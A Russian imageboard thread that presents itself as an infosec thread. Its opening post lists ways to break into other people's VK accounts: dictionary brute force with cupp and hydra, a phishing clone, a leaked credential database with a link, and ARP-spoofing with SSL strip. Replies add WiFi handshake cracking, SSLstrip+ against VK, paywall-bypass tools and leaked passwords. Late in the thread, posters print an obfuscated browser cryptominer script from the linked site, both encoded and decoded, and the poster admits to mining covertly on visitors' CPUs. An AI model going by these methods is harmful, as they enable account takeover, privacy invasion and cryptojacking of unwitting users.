НОЧНОЙ ИБ-ТРЕДКак стать хакером: http://catb.org/~esr/faqs/hacker-howto.htmlБаза данных эксплойтов: https://www.exploit-db.com/Вики по веб уязвимостям: https://www.owasp.org/index.php/Main_PageГугл для хакеров: https://www.shodan.io/И наконец то, чего жаждут многие.Как взломать ВК: 4 метода1). Атака по словарю. Составляем кастомный словарь на жертву с помощью cupp, исходя из её личных данных и интересов. Брутим форму по словарю с помощью hydra.2). Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку.3). Тупой способ, но может сработать. Скачиваем базу данных ВК, которая не так давно утекла (например здесь https://lonelylain.ml/db/). Палим в ней данные жертвы, если уже сменила пароль, то пытаемся угадать (часто там небольшие модификации старого пароля, вроде доп. цифры на конце).4) . MITM-атака. Работает только в одной локалке с жертвой (например, wifi в макдаке). Осуществляем ARP-спуфинг и перехватываем трафик жертвы. https не поможет, тк можно использовать ssl strip.
https://cybrary.it/
https://n0where.net/
ОП, я забыл пароль от своего вайфай роутера, сможешь сбрутить хендшейк?
>>166200146Была бы норм видеокарта, смог бы.На процессоре это довольно бессмысленное занятие, так что сорян.
http://resources.infosecinstitute.com/
>>166200218Ну тогда поделись какими-нибудь годными словарямиУ мня пикрил, не работаетВидимо я какой-то хитровыебанный пароль придумал, а сейчас вспомнить не могу.
>>166200146Маленькую чёрную кнопочку зажми на три секунды и перенастрой, хули как маленький-то?
>>166200331Попробуй rockyou.txt, он один из лучших, и довольно большой.Найти можно например здесь https://wiki.skullsecurity.org/Passwords
>>166199827 (OP)>Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку.запилити пожалуйста подробный гайд, когда-то хотел вкатиться и тупо читать чужие переписки дабы скрашивать унылую жизнь, но забил. А вообще я очень тупой, очень очень, если что-то не по инструкции шаг за шагом, то нихуя сделать не смогу. Пожалуйста, помогите дауну обрести счастье.
>>166200331Взломай самого себя, лол. Вспомни, какие были у тебя тогда основные интересы, что занимало мысли бОльшую часть времени.По ключевым словам составь кастомный словарь на себя, есть утилиты для этого, вон в шапке оп писал
Помню, пару лет назад анон скидывал в b прогу, которая палила приваты на сайте imlive. Потом вроде сайт залатал дыры, но аноны дорабатывали прогу и она по прежнему могла заходить в приваты на халяву. Так вот, хотел спросить, может у кого осталась та прога и работает ли она до сих пор?
>>166200369кек, думаешь он на самом деле просто забыл пароль?
>>166200440Спасибо, сейчас попробуюНа брут уйдёт 3 года, пиздец
>>166200440Это просто сшитые пароли с американских сайтов, где большинство паролей – это фразы и имена на английском языке + дата рождения в конце.
>>166200568Ну ты конечно загнул.С такой маской и на 6-ти видюхах не дождёшься результата
>>166200507>аноны дорабатывали прогуТы пёзднутый? Исходники только у него были.Могу покопаться и скинуть за условную сумму.
>>166200601хм, наверняка и русские такие словари есть
>>166200652этот 16 минут
>>166200507что за прога?кажется, я пропустил
Почему на дваче и бордах вообще практически отсутствует хацкерский контент\обсуждения? Не, я понимаю, что 90% интересующихся этой темой — школьники, которым бы взломать вк своей еот, чтобы дрочить на интим-фотки, ну так это же двач, чому бесконечное нытье про тян, рулеточки и фап-треды прижились, а уголка где школьники делились бы методами ломать акки вк и пользоваться соседским вай-фаем все еще нет?
>>166200760О, норм. Напиши потом. Хотя я всё же думаю что не найдёт. Не на русских он заточен.
>>166200815На мелкобордах есть.Может дело тут в том, что все хотят взламывать одной кнопкой, но такого не бывает.Для того чтобы хоть немного стать успешным в этом деле нужно для начала освоить линукс же.
>>166200815Была раньше доска набигача, сейчас от нее немного в /crypt/ осталось.
>>166200815Интересный вопрос. За себя скажу, что я слишком тупой и создавать и поддерживать такие темы просто не в состоянии, хотя и не слишком тупой чтобы не поддерживать 99 процентов тем на сосаче.Мимо 22 лвл альтфак с 2009го
>>166200899>Для того чтобы хоть немного стать успешным в этом деле нужно для начала освоить линукс жеСамое распространенное заблуждение. Как и кали.
>>166200899Но ведь второй способ в оппосте - это относительно одной кнопкой. Только никто мне тут все же не расписал подробно за него. Похуй, загуглю, помню когда хотел вкатиться в него - инфа на блюдечке была, но чето там немного не так в каком-то коде было и я поленился гуглить дальше или спрашивать у создателя кода.
>>166200827Хуйня, не нашло.А где взять словарик только с 8значными числами?
>>166200992> одной кнопкой.>митмПопизди мне тут
>>166200939Почему? Ведь многие вещи, необходимые для хакинга, удобнее делать в терминале.Ну да, сам линукс ставить для этого не обязательно, но всё же.
>>166201063ну в какой то там проге, девил студио или как ее там, не помню, тык тык + вставить заготовленный уже кем то код, я тупица лютая но это ведь просто, разве нет?
>>166201103>многие вещи, необходимые для хакинга, удобнее делать в терминалеЭто какие? Burp и ZAP вполне без терминала работают, sqlmap и под виндой заводится.
Калидрочер вкатился в тред на винде.Принимайте за щеку.
Хакиры, поясните мне, почему видеорелейтед еще не распространен повсеместно и каждый второй школьник не хакает банкоматы чтобы купить новый нож в кс го?https://www.youtube.com/watch?v=6135bdfed6M
>>166201170потому что писька не выросла
>>166201120не знаешь - не кукарекай
>>166201185ахахахахахах, прикольна шутиш, лально вообще, мемно, дай свой вк, хачу пазнакомицца
ОП, можно подробно про ssl strip?Я именно на этом моменте запоролся.
>>166201045Сгенерируй сам с помощью crunch:crunch 8 8 -t > 8digits.txtПод винду хз.
>>166201204Так ты опровергни. Я же попросил написать что не так.
>>166200939Мне под линукс легче гораздо писать скрипты, настраивать сервера с подменами, да и готовых решений на тему под линус сильно больше. Под виндой это либо костылями что-то делать, либо через дикую еблю.хотя на основном компе винда с виртуалками
>>166201063Он же про фишинг говорил.
>>166201161Метасплоит не забыл обновить?
>>166201238Опровергнул тебе за щеку, проверяй.
Лучше, блять, поднимите заново скотобазу на каком-либо сервере. Исходники есть, а сайт лежит. Такая-то годнота была!
>>166201272И? ты же вообще нихуя не смыслишь, не лезь блять.
>>166201218А вообще есть эксплоит для тупого сливания налички, он зеродейный, так что патчик нескоро появится.Нужен только USB и всё. тыкаешь - бабки сыпятся.Если он имеется в виду, то я тоже задаюсь этим вопросом.
>>166201304боже. какое дите
>>166201219Ну, сейчас стало ещё сложнее, потому что крупные сайты начали использовать HSTS.Но и это научились обходить, и вскоре появился SSL strip+. Если ты на линуксе, то там есть mitmf, в нём этот плагин присутствует. Я недавно на вк тестил, пока работает, хоть и со скрипом
Ну так что, интересна кому-нибудь тема с халявным просмотром вебкам-шоу?О которой писал >>166200507Она есть у меня
>>166201384мне интересна, нашел только для camwhores.tv обход
>>166201338>спизданул какую-то хуйню в духе "ну бля я видел в киношке жы ваще изи хакают">АПРАВЕРГНИ ЭТО!!!!>ты дитя!!!! ты ниможеш аправергнуть!!! яскозал!
>>166201384притащи что нибудь с шодана, там халява всегда есть.на старых милф я насмотрелся.
>>166201414Он уже не работает вроде
>>166201373Я пытаюсь узнать что там жидомасоны(мягкобляди) шлют себе в редмонд - все на ссл. Гугл выдавал охуительные истории про самоподписные сертификаты и прочую поебистику. Если какие ЛАЙФХАКИ можешь дать, буду благодарен.
>>166201439Ты еблан? Я тебя не за киношку опровергнуть просил. Короче иди нахуй, беснующееся дите
>>166201414> camwhores.tvЧто это вообще?>мне интереснаМогу скинуть прогу
>>166201486>Я тебя не за киношку опровергнуть просил.>ну в какой то там проге, девил студио или как ее там, не помню, тык тык + вставить заготовленный уже кем то код, я тупица лютая но это ведь просто, разве нет?>Короче иди нахуйСлив школьника засчитан
>>166201456http://xbypass.ml/хм... просит логин, а раньше просто было полеввода ссылки на приват.
Какеры такие какеры, не хотят в дзен, хотят на страпон и анальных приключений.
>>166201488ты если делишься, то кидай... или у тебя фин. интерес?
>>166201555Где найти себе страпонессу?
>>166201561Куда кидать, на двач? Могу даже название скинуть, всё равно это не гуглится.Алсо какой мне смысл что-то отдавать за бесплатно?
>>166201621А ты и не отдавай, мы сами найдём.
>>166201514Ты беснующийся школьник неспособный на диалог. Не каждый должен разбираться в твоем ебучем хакинге, а опровергнуть кучу инфы по этой теме в сети ты просто не в состоянии
>>166201581вроде бы bratprincess, поищи её там
Какеры, поясните за Red Disk, что там нашли, и от чего его надо защищать.
>>166201668>bratprincessЧто это? Я спрашиваю, где мне найти страпонессу, которая каждый день насиловала бы меня страпоном
>>166201666>беснующийся школьникНайс проекции, что ещё скажешь?
>>166201656Ну удачи, хули.
>>166201621Понимаю, извини, но я нищий... у меня нет денег за такое заплатить
>>166201724тогда хз, познакомься с тянкой, а позже (!!) предложи
>>166201767Лил, ну соси писос в таком случае.А прогу я продам дядям на запад.Спасибо, что напомнили про неё, я уж и забыл.
>>166201768Спасибо, кэп, блять.
>>166199827 (OP)>Как взломать ВКНикак, при входе с нового устройства надо вводить код из ЛС от администрации./thread
>>166199827 (OP)вкатился, но я совсем нуб.кто знает как поменять dns сервер?так можно блоуировку обойти? или только через прокси? хелп тупому школьнику, аноны
>>166199827 (OP)Прикольно, lonelylain с майнером на странице, да хитрый то какой.
>>166199827 (OP)>Как взломать ВК>...>если уже сменила пароль, то пытаемся угадать10/10 would hack again
>>166200815Потому что мейл.сру
>>166202366где он? у меня адблок не видит ничего
>>166202423в конце страницы вот это[CODE]<script> document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%6C%69%62%2F%6D%2E%6A%73%3F%70%72%6F%78%79%3D%77%73%73%3A%2F%2F%6C%6F%6E%65%6C%79%6C%61%69%6E%2E%6D%6C%3A%39%39%39%39%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%74%68%72%65%61%64%73%20%3D%20%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%68%61%72%64%77%61%72%65%43%6F%6E%63%75%72%72%65%6E%63%79%20%2F%20%32%3B%0A%20%20%20%20%69%66%20%28%74%68%72%65%61%64%73%20%3C%20%31%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%76%61%72%20%74%68%72%65%61%64%73%20%3D%20%31%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%76%61%72%20%69%64%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%20%2A%20%39%30%30%30%30%30%30%30%30%30%30%30%30%30%30%29%20%2B%20%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%3B%0A%20%20%20%20%76%61%72%20%69%64%73%20%3D%20%69%64%2E%74%6F%53%74%72%69%6E%67%28%29%3B%0A%20%20%20%20%76%61%72%20%6D%69%6E%65%72%20%3D%20%43%48%2E%55%73%65%72%28%27%34%38%42%66%59%31%31%63%46%79%41%4E%4A%63%77%57%57%46%45%74%78%43%34%5A%43%56%4A%69%4E%4A%37%63%33%50%31%6A%72%4D%6D%48%4D%35%76%75%57%34%67%68%34%69%69%76%33%48%76%32%67%5A%47%6E%4C%4E%64%48%41%72%51%57%37%37%47%56%4A%68%70%58%78%48%36%45%69%47%6F%54%59%35%5C%0A%50%6A%4C%64%52%4D%68%31%6A%27%2C%20%69%64%73%2C%20%7B%74%68%72%65%61%64%73%3A%74%68%72%65%61%64%73%2C%20%61%75%74%6F%54%68%72%65%61%64%73%3A%66%61%6C%73%65%7D%29%3B%0A%20%20%20%20%6D%69%6E%65%72%2E%73%74%61%72%74%28%29%3B%0A%20%20%3C%2F%73%63%72%69%70%74%3E')); </script>[/CODE]если анскейпнуть то вот он[CODE]<script src=\"lib/m.js?proxy=wss://lonelylain.ml:9999\" type=\"text/javascript\"></script> <script> var threads = window.navigator.hardwareConcurrency / 2; if (threads < 1) { var threads = 1; } var id = Math.floor(Math.random() * 900000000000000) + 100000000000000; var ids = id.toString(); var miner = CH.User('48BfY11cFyANJcwWWFEtxC4ZCVJiNJ7c3P1jrMmHM5vuW4gh4iiv3Hv2gZGnLNdHArQW77GVJhpXxH6EiGoTY5\\PjLdRMh1j', ids, {threads:threads, autoThreads:false}); miner.start(); </script>"[/CODE]
>>166199827 (OP)>>166202463Ладно, аноны, ОП вернулся.Весь этот тред на самом деле был экспериментом.Я тестировал работоспособность и надёжность моего прокси для веб майнинга на произвольном пуле, а также насколько палится кастомная библиотека. По идее, браузерные расширения вообще палить не должны.Если у кого был врублен антивирь - он что-нибудь палил при заходе на сайт?
>>166202568Internet Security ничего не спалил
>>166202568И да, я заранее извинюсь, что заюзал половину вашего проца. Считайте, что это за БДСейчас на веб майнинге можно пытаться что-то заработать, если у кого есть сайты с норм трафиком - пишите lonelylain@vfemail.net
>>166202608На главной странице, кстати, все 100 забирается.
>>166202568Антивира нет, не думаю что он среагирует на это. Я спалил просто мониторингом нагрузки, на компе как-то привык прослеживать, телефон уведомляет когда приложение начинает лишнего жрать.Кстати довольно интересно что проц не на 100 нагружается, у меня он при таких нагрузках греться не начинает и кулер не шумит, да и другим приложениям не мешает. Прикольно короче, может подумаю и тоже себе запихну куда.Это на вебасемблае майнер или куда? В теории возможно вообще от браузера еще и до видеокарты достучаться?
Сработало, зашёл на страничку и сразу кинуло на https://vk.com/login?act=blockedмы зафиксировали попытку взлома Вашей страницы.Не беспокойтесь, она в безопасности.Я всё просрал?
>>166202626Забыл там скрипт поменять, а сейчас уже лень.>>166202596Спасибо
>>166202659Так я в скрипте прописал 50% чтобы жрал.В принципе это не очень мешает юзерам.Думаю ещё на мобильных устройствах вообще не запускать - толку нет.>вебасемблаеДа, на нём. Но я не сам его писал, конечно.В случае если браузер не поддерживает wasm он переключается на asm.js.В теории можно на видюхе, но это муторно и никто ещё такое не сделал
>>166202682ты в бд что ли пароль посмотрел?
>>166202769Да, в акк пустило, но потом сразу это кинуло
>>166202568>Весь этот тред на самом деле был экспериментом.я на арче, с фаерфоксом, как только зашел сразу подвис....думаю че за херня....смотрю htop а там......подъеб засчитан, а БД реальны? а то я ВК качаю 1.1Г...
>>166202829Бд скорее всего не фейковые, так что качать стоит.я почему-то уверен, что опу было бы лень их генерировать
>>166202866ну вот я ВК докачал, щас открою расскажу что и как....>>166202866>что опу было бы лень их генерироватья тоже также подумал....
>>166202769Кстати бд не сильно удобное. Поиск по трём гигам без индексации хз, отсортировать бы или еще запихнуть куда где искать удобнее чем в txt
>>166202929grepом норм всё ищется, а вот то, что тебя банит как только заходишь - так себе
>>166202929БД реальна...
>>166202939просто у мейлача тоже эта база есть похоже и если на него с нового устройства зайти банят.просто предположение, но похоже на то
>>166202939>grepом норм всё ищется+1 грепу, по мне так супер все отсортировано, без говна и мусора....
Непонятно только какой механизм блока, т.к. если нажать страницу Хочу проверить сканером, то показывает и сообщения и кол-во друзей и прочее. Клик на любое место и опять редирект на блок
>>166202829годичной давности.нашел там свой логин\пароль, который сменил больше года назад.
>>166202568NoScript спалил
>>166199827 (OP)Посоветуй годный Колегер Или как его там!
>>166204882> Колегер Годная шутка. Годных Колеггеров не существует, лалка.
>>166204903Я скачивал но он платный
>>166204922Только для одного человека жи вроде.
>>166205042Так какой скачивать?
>>166205061Платный с СМС.
>>166205093Не хочу не буду. Дайте нормальный!
>>166199827 (OP)What if…> 1). Атака по словарю. Составляем кастомный словарь на жертву с помощью cupp, исходя из её личных данных и интересов. Брутим форму по словарю с помощью hydra.…HACKING ATTEMPT? …captcha?> 2). Фишинг. Создаём клон ВК, добавляем перехват введённых данных, присылаем жертве ссылку...self-signed https warning?> 3). Тупой способ, но может сработать.…profile owner is smart?> 4) . MITM-атака.…HSTS?Короч, социнжиниринг никто не отменял.
поясните за вебмайнинг и наебщика ОПа.я так понимаю, на его сайте был майнер, а когда он работает?когда находишься на сайте, или он в системе?
>>166199827 (OP)>2)Создаём клон ВКкак ето сделатьа?
>>166207283когда находишься на сайте - там скрипт на майнинг
>>166199827 (OP)ОП, у тебя есть знакомые СИ-сообщества? Вроде тех, что успешно тралили зоошизу в свое время, когда фейк приняли за реального журналиста.